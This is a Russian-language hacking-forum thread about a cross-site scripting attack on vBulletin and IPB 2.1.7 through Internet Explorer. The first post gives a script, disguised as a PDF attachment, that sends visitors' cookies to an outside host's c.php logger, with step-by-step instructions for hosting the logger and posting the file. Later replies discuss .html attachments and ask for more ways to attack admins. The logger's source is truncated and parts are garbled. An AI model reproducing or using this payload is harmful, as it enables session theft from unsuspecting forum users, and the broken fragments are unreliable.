|
XSS vbulletin and IPB v2.1.7 With IE
XSS vbulletin and IPB v2.1.7 With IE
test:<html><script> alert("hello");</script></html> ----------------------------------------------------------------- test.pdf ------ Код:
<html><script>img = new Image(); img.src = "http://blablabla.org/c.php?c="+document.cookie;</script></html>c.php ----- Код:
<?php 2_ Помещенный c.php на webserver. 3_ Изменяют(Заменяют) url в test.pdf. 4_ Делают пост с test.pdf как attachement. 5_, когда кто - то будет смотреть на ваш attachement, Вы получите его печенье в log.txt Лог сниффера Код:
<html> |
ребята как заставить его работать ?
Код:
<html>Код:
<html> |
Дык.. не обязательно pdf. Ещё можно точно такую же шнягу провести и с .html -) В IPB по крайне мере иногда разрешен данный вид атача.
|
Код не работает.=(
|
MeXoN в каком браузере проверял?
|
Во всех!!
|
Мошь есть какие нить еще способы нае.... Админов=)
|
| Время: 21:17 |